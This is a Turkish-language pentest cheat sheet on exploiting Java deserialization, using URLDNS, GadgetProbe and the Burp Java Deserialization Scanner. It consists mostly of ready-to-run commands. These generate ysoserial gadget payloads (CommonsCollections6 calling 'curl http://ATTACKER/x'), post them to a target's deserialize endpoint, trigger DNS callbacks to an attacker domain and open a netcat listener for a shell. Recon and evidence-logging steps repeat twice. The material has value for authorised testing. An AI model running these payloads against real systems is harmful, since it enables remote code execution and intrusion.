Skip to content

Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner

web deserialization

Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner güvenilmeyen serileştirilmiş veri veya prototype/class pollution üzerinden gadget zinciriyle RCE veya auth bypass arar.

  1. Serileştirilmiş girdiyi ve parser’ı tespit et.

  2. Kör OAST (DNS/URLDNS) ile doğrula.

  3. Uygun gadget / pollution zincirini kur.

  4. RCE veya auth bypass etkisini kanıtla.

Terminal window
curl -sk https://TARGET/ -b jar | rg -i 'rO0|aced0005|__VIEWSTATE|O:|pickle|yaml|ObjectInput|java\.'
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc all
cookie, hidden field, JWT claim, message queue, Redis cache
Terminal window
ysoserial CommonsCollections6 'curl http://ATTACKER/x' | base64 -w0
Terminal window
ysoserial CommonsBeanutils1 'id' > payload.bin
Terminal window
java -jar ysoserial.jar URLDNS 'http://UNIQUE.ATTACKER/' | xxd
Terminal window
curl -sk https://TARGET/deserialize -H 'Content-Type: application/java-serialized-object' --data-binary @payload.bin
Terminal window
java -jar GadgetProbe.jar -o out.bin --dns UNIQUE.ATTACKER
Terminal window
burpsuite # Java Deserialization Scanner eklentisi
URLDNS ile kör doğrulama → gadget class varlığı → RCE gadget
Terminal window
curl http://ATTACKER/hit
Terminal window
nc -lvnp 443
DNS callback → class confirm → RCE gadget → shell

Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
nuclei -u https://TARGET -as -silent
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt

Bu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
curl -sk https://TARGET/sitemap.xml
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
Terminal window
nuclei -u https://TARGET -as -silent
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt
request/response
zaman damgası
kullanılan hesap
etki özeti
Terminal window
curl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html